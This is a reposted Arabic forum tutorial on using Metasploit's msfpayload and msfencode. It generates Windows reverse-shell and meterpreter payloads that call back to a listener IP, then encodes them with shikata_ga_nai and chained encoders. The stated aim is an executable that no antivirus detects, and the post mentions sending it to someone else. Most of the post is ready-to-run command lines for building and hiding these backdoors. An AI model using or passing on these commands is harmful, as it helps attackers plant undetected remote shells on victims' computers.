الصراحة الموضوع منقول و لكنه مهم جدآآ
بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاتة
كيف صحتكم واوالكم وظروفك
ان شاء الله رب العالمين تكونو بألف خير وصحة وسلامة وعافية
اليوم درسنا يتكلم عن التشفير بالميتاسبلويت
لنفرض انك انشأت بايلود بالـ msfpayload وفحصته او ارسلته لأحد اظن انه رح ينكشف من برنامج الحماية
لكن درسنا اليوم رح يتم تشفير البايلود نهائي من اي حمايات
نبدأ اول شيء
نذهب لل CMD SHELL
نكتب امر
كود PHP:
ruby msfencode -h
اظهار تعليمات حول الادرة
كود PHP:
ruby msfencode -l
يظهر انواع التشفيرات المتوفرة وقوت كل واحد
واقوى واحدة وهي شيكاتا
كود PHP:
x86/shikata_ga_nai
الآن نأتي لتعريف الاوامر لها والمهمة والرئيسية
-e نوع التشفير يتبعها الاسم كـ
كود PHP:
-e x86/shikata_ga_nai
-t صيغة التشفير يتبعها الصيغة
والمتوافرة في الاداة هي 6 وهي
raw, ruby, perl, c,exe, vba
يكون الامر كـ
كود PHP:
-t perl
-i لأستيراد بايلود صنعتة سابقا وتريد تشفيرة الآن
يكون الامر هكذا
كود PHP:
-i C:server.exe
او باللينكس يكون الامر متبوع بالاسم مباشرة هكذا
كود PHP:
-i server.exe
او حسب المسار باللينكس
الان عند التشفير يجب وضع -o لأخراج الملف للخارج اذا لم تريد ان يطبعه على شكل كود برمجي وفي وندوز سواء وضعته ام لا لن يفعل شيء
لانك بآخر الكود رح تضع
كود PHP:
>"C:\"service.exe
ويفضل وضعه
لم نتطرق الى جميع الاوامر لكن في المستقبل القريب
في الوقت هذه اللي تهمنا فقط ... باقي 5 اوامر غير مهمة كثيرا
الآن نأتي للعملي
نعرف في العادة ان صناعة اي بايلود يكون هكذا
كود PHP:
ruby msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.1 LPORT=4444 X >"C:\"server.exe
الآن هذا الامر واضح يقوم بصناعة بايلود لكن اذا ذهب وفحصته بأي موقع فحص او حماية جهازك ترى انه مكشوف
الآن هو في المسار C:\
الآن لنقم بتشفيره بالأمر
كود PHP:
ruby msfencode -e x86/shikata_ga_nai -i C:server.exe -t exe -o >"C:\"encoded.exe
لنوضح الاوامر بدقة
كود PHP:
ruby msfencode
لأستخدام الاداة (التشفير)
كود PHP:
-e x86/shikata_ga_nai
وكما ذكرت لأستخدام النوع الذي تريد التشفير به اونا اخترت شيكاتا وهو اقوى واحد مشفر من جميع الحمايات عدى اثنين او ثلاثة وهي AVG و avast والثالث لم اذكر اسمه
كود PHP:
-i C:server.exe
وايضا كما ذكرت لتشفير ملف تم انشائه سابقا متبوعا بالمسار واذا كان بداخل المجلد كما في اللنكس نضع فقط الاسم
كود PHP:
-t exe
وايضا كما ذكرت سابقا لأختيار الصيغة وهنا صيغة exe ملف تنفيذي
كود PHP:
-o
لاخراجة للخارج وعدم طباعته على الشاشة
لنفرض انك تريد الشل بلغة بيرل او سي اي مطبوع على شاشة الدوس
كود PHP:
ruby msfencode -i C:server.exe -t c test.exe
وسترى انه طبعه على شاشة الدوس بتشفير شيكاتا
ييجي واحد ويقول ليش ما اخترنا نوع التشفير
اقوله لأن الاداة تختار التشفير شيكاتا تلقائي
الآن نقدر نسوي كل هذا من صنع بايلود وتشفيره على سطر واحد ونسمي الملف بالأخر
انظروا كيف..
كود PHP:
ruby msfpayload windows/shell/reverse_tcp LHOST=192.168.1.137 LPORT=4444 X | ruby msfencode -e x86/shikata_ga_nai -t exe >"C:\"finish.exe
اول امر وهو صناعة بايلود لكن دون وضع اسم ومكان الحفظ فقط وضعنا الصيغة exe اختصار لـ X وفصلناه مع الأمر الآخر برمز | ثم كتبنا الامر التالي وهو واضح اختيار التشفير شيكاتا والصيغة ومكان الحفظ
ويوجد ايضا التشفير بأكثر من نوع
كود PHP:
ruby msfpayload windows/shell/reverse_tcp LHOST=192.168.1.15 LPORT=4444 | ruby msfencode -e x86/shikata_ga_nai -t raw -c 5 | ruby msfencode -e cmd/generic_sh -t raw -c 5 | ruby msfencode -e x86/countdown -t perl >"C:\"3encoders.exe
كل شيء واضح عدا -t raw -c 5 اي انه يجمع الصيغة وبالىخر يتم اختيارها
الآن افحص الملف وستجده انه غير مكشوف من اي حماية
هذا هو درسنا
وان شاء الله استفدتوا
واللي مو فاهم يقول لي وانا بالخدمة
ولشباب اللينكس فقط التغييرات بسيطة مجرد من ruby الى ./ و المسار C الى اسم فقط او مسار تفضله وبأمكانك وضع اسم الملف فقط وستجده داخل مجلد اداة الميتاسبلويت
مع تحياتي
لا للاحتكار
المجهوول